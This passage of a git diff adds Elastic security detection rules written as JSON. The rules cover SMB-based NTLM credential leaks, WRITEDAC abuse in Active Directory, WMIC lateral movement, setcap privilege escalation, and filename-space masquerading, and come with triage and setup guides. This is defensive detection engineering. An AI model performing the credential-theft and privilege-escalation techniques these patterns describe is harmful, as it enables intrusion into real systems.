"MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "f580bf0a-2d23-43bb-b8e1-17548bb947ec_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_3.json b/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_3.json new file mode 100644 index 00000000000..5dec5533bc5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_3.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects rare internet network connections via the SMB protocol. SMB is commonly used to leak NTLM credentials via rogue UNC path injection.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.network-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Rare SMB Connection to the Internet", + "new_terms_fields": [ + "destination.ip" + ], + "query": "event.category:network and host.os.type:windows and process.pid:4 and \n network.transport:tcp and destination.port:(139 or 445) and \n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", + "references": [ + "https://www.securify.nl/en/blog/living-off-the-land-stealing-netntlm-hashes/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 47, + "rule_id": "f580bf0a-2d23-43bb-b8e1-17548bb947ec", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 3 + }, + "id": "f580bf0a-2d23-43bb-b8e1-17548bb947ec_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_3.json b/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_3.json new file mode 100644 index 00000000000..129e060c0b2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_3.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the access on an object with WRITEDAC permissions. With the WRITEDAC permission, the user can perform a Write Discretionary Access Control List (WriteDACL) operation, which is used to modify the access control rules associated with a specific object within Active Directory. Attackers may abuse this privilege to grant themselves or other compromised accounts additional rights, ultimately compromising the target object, resulting in privilege escalation, lateral movement, and persistence.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "WRITEDAC Access on Active Directory Object", + "query": "event.action:\"Directory Service Access\" and event.code:\"5136\" and\n winlog.event_data.AccessMask:\"0x40000\"\n", + "references": [ + "https://www.blackhat.com/docs/us-17/wednesday/us-17-Robbins-An-ACE-Up-The-Sleeve-Designing-Active-Directory-DACL-Backdoors.pdf" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMask", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "f5861570-e39a-4b8a-9259-abd39f84cb97", + "setup": "## Setup\n\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1222", + "name": "File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/", + "subtechnique": [ + { + "id": "T1222.001", + "name": "Windows File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 3 + }, + "id": "f5861570-e39a-4b8a-9259-abd39f84cb97_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_3.json b/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_3.json new file mode 100644 index 00000000000..1d33a520a15 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_3.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of wmic.exe to run commands on remote hosts. While this can be used by administrators legitimately, attackers can abuse this built-in utility to achieve lateral movement.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "WMIC Remote Command", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"WMIC.exe\" and\n process.args : \"*node:*\" and\n process.args : (\"call\", \"set\", \"get\") and\n not process.args : (\"*/node:localhost*\", \"*/node:\\\"127.0.0.1\\\"*\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f59668de-caa0-4b84-94c1-3a1549e1e798", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.006", + "name": "Windows Remote Management", + "reference": "https://attack.mitre.org/techniques/T1021/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "f59668de-caa0-4b84-94c1-3a1549e1e798_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_5.json b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_5.json new file mode 100644 index 00000000000..040e407190e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_5.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Setcap setuid/setgid Capability Set", + "note": "## Triage and analysis\n\n### Investigating Setcap setuid/setgid Capability Set\n\nSetuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group.\n\nThreat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions.\n\nThis rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was targeted by the addition of the setuid/setgid capability through OSQuery.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator that performed these actions for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name == \"setcap\" and process.args : \"cap_set?id+ep\" and not process.parent.name in (\"jem\", \"vzctl\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f5c005d3-4e17-48b0-9cd7-444d48857f97", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.001", + "name": "Setuid and Setgid", + "reference": "https://attack.mitre.org/techniques/T1548/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "f5c005d3-4e17-48b0-9cd7-444d48857f97_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_3.json b/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_3.json new file mode 100644 index 00000000000..9127bddd363 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_3.json @@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same parent process name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_high_sum_by_parent", + "name": "Suspicious Windows Process Cluster Spawned by a Parent Process", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "f5d9d36d-7c30-4cdb-a856-9f653c13d4e0", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_4.json b/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_4.json new file mode 100644 index 00000000000..4eb6b4acd01 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_4.json @@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same parent process name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_high_sum_by_parent", + "name": "Suspicious Windows Process Cluster Spawned by a Parent Process", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "f5d9d36d-7c30-4cdb-a856-9f653c13d4e0", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\n**Before you can enable this rule**, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\". Warning: if the ingest pipeline hasn't run for some reason, such as no eligible data in winlogbeat has come in yet, _you won't be able to see this card yet_. If that is the case, try troubleshooting the ingest pipeline, and if any ProblemChild predictions have been populated yet.\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_6.json b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_6.json new file mode 100644 index 00000000000..0e498a7bd4c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_6.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rules identifies a process created from an executable with a space appended to the end of the filename. This may indicate an attempt to masquerade a malicious file as benign to gain user execution. When a space is added to the end of certain files, the OS will execute the file according to it's true filetype instead of it's extension. Adversaries can hide a program's true filetype by changing the extension of the file. They can then add a space to the end of the name so that the OS automatically executes the file when it's double-clicked.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Masquerading Space After Filename", + "query": "process where host.os.type:(\"linux\",\"macos\") and\n event.type == \"start\" and\n (process.executable regex~ \"\"\"/[a-z0-9\\s_\\-\\\\./]+\\s\"\"\") and not\n process.name in (\"ls\", \"find\", \"grep\", \"xkbcomp\")\n", + "references": [ + "https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques-t1036-masquerading" + ], + "related_integrations": [ + { + "package": "endpoint", + 